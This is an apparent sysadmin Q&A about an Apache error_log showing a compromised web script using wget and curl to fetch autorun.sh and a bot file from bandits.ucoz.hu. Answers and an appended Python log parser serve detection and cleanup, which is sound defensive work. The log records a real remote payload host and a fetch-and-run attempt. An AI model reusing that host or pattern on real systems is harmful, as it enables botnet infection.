I'm facing a problem with Apache. The following logs are showing in the error_log file.

--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

     0K                                                       100% 51.6M=0s

15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  70387      0 --:--:-- --:--:-- --:--:--     0
connected.
HTTP request sent, awaiting response... 200 OK
Length: 28762 (28K) [text/plain]
Saving to: `b0t3.txt'

     0K .......... .......... ........                        100% 8.75M=0.003s

15:01:27 (8.75 MB/s) - `b0t3.txt' saved [28762/28762]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 28762  100 28762    0     0  3434k      0 --:--:-- --:--:-- --:--:-- 13.1M
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
--15:01:27--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'

     0K                                                       100% 31.8M=0s

15:01:27 (31.8 MB/s) - `autorun.sh' saved [396/396]

sh: fetch: command not found
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   396  100   396    0     0  48768      0 --:--:-- --:--:-- --:--:--     0

How can I prevent this issue?

user9517

User4283

2 Answers

It seems someone tried to download and run a Perl script using one of your web pages, which might be vulnerable. - Try to disable execution of all interpreters (perl, python, curl, c, etc.).

  • I assume it could be Apache + PHP; if yes, you may disable it: allow_url_fopen = Off, to disable downloads via PHP.
  • add httpd mod_security
  • fix your vulnerable web page script
  • open the outgoing firewall only for certain IPs/ports
chocripple
  • I'll do that and update accordingly... Thanks for the suggestion, as I'm very disturbed by this happening – User4283 Jul 19 '11 at 14:32
  • This is only the tip of the iceberg. Someone has deployed malicious code on your server, is able to invoke it remotely, and at least some of it is running on your server. Some of what they are deploying is written in Perl - but this part is failing. Kudos to User4283 for finding the problem - but fixing it is a lot more complicated than Rikih seems to imply. As above, the hacker has got past 3 hurdles already – symcbean Jul 19 '11 at 14:38
  • I've added HTTPD mod_security, scanned the system with rkhunter, and applied the suggestions rkhunter gave for my server. rkhunter did not find any rootkit. Any other suggestion or help? – User4283 Jul 19 '11 at 18:18

You have a script somewhere reaching out to grab what looks like a botnet script, trying to save it & execute it locally, which is not happening, as it is in the error file.

  • block the bandits IP [though there are probably several more]
  • find that script [grep for the bandits URL]
  • find out what that script is using to retrieve the file [block it if you can]
  • download & scan with rkhunter
  • watch your mail queue
  • watch for odd things in your process list

-sean

Sean Kimball
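The error_log lines in the question are wget/curl/sh output that Apache captured on stderr, which is why they are a useful detection signal. The following added example (not code from either answer) parses such lines into fetch attempts, completed saves, failed tool invocations and the set of remote hosts to investigate; the sample input is taken from the excerpt in the question.

```python
import re

# Sample input: lines copied from the error_log excerpt in the question.
SAMPLE_LOG = """--15:01:26--  http://bandits.ucoz.hu/autorun.sh
Resolving bandits.ucoz.hu... 193.109.247.50
Connecting to bandits.ucoz.hu|193.109.247.50|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 396 [application/octet-stream]
Saving to: `autorun.sh'
15:01:26 (51.6 MB/s) - `autorun.sh' saved [396/396]
sh: fetch: command not found
sh: /usr/bin/lwp-download: /usr/bin/perl: bad interpreter: Permission denied
sh: /usr/bin/perl: Permission denied
"""

# wget banner line: "--HH:MM:SS--  http://host/path"
WGET_START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(https?://([^/\s]+)/\S*)$")
# wget completion line: "HH:MM:SS (rate) - `file' saved [got/total]"
WGET_SAVED = re.compile(r"^(\d\d:\d\d:\d\d) \(.*\) - `(.+?)' saved \[(\d+)/(\d+)\]$")
# sh failing to run a downloader or interpreter (fetch, lwp-download, perl ...)
SHELL_FAIL = re.compile(r"^sh: (\S+?): (?:command not found|.*Permission denied)$")


def scan_error_log(text):
    """Return fetch attempts, completed saves, failed tools and remote hosts."""
    report = {"fetches": [], "saved": [], "failed_tools": [], "hosts": set()}
    for line in text.splitlines():
        m = WGET_START.match(line)
        if m:
            report["fetches"].append({"time": m.group(1), "url": m.group(2), "host": m.group(3)})
            report["hosts"].add(m.group(3))
            continue
        m = WGET_SAVED.match(line)
        if m:
            report["saved"].append({"time": m.group(1), "file": m.group(2), "bytes": int(m.group(3))})
            continue
        m = SHELL_FAIL.match(line)
        if m:
            report["failed_tools"].append(m.group(1))
    return report


def is_suspicious(report):
    """Any outbound fetch by the web server, or a file it saved, warrants investigation."""
    return bool(report["fetches"] or report["saved"])


if __name__ == "__main__":
    for key, value in scan_error_log(SAMPLE_LOG).items():
        print(key, value)
```

The `hosts` set is the input for the "block the IP" and "grep for the URL" steps above; the `saved` file names are what to look for on disk and in the process list.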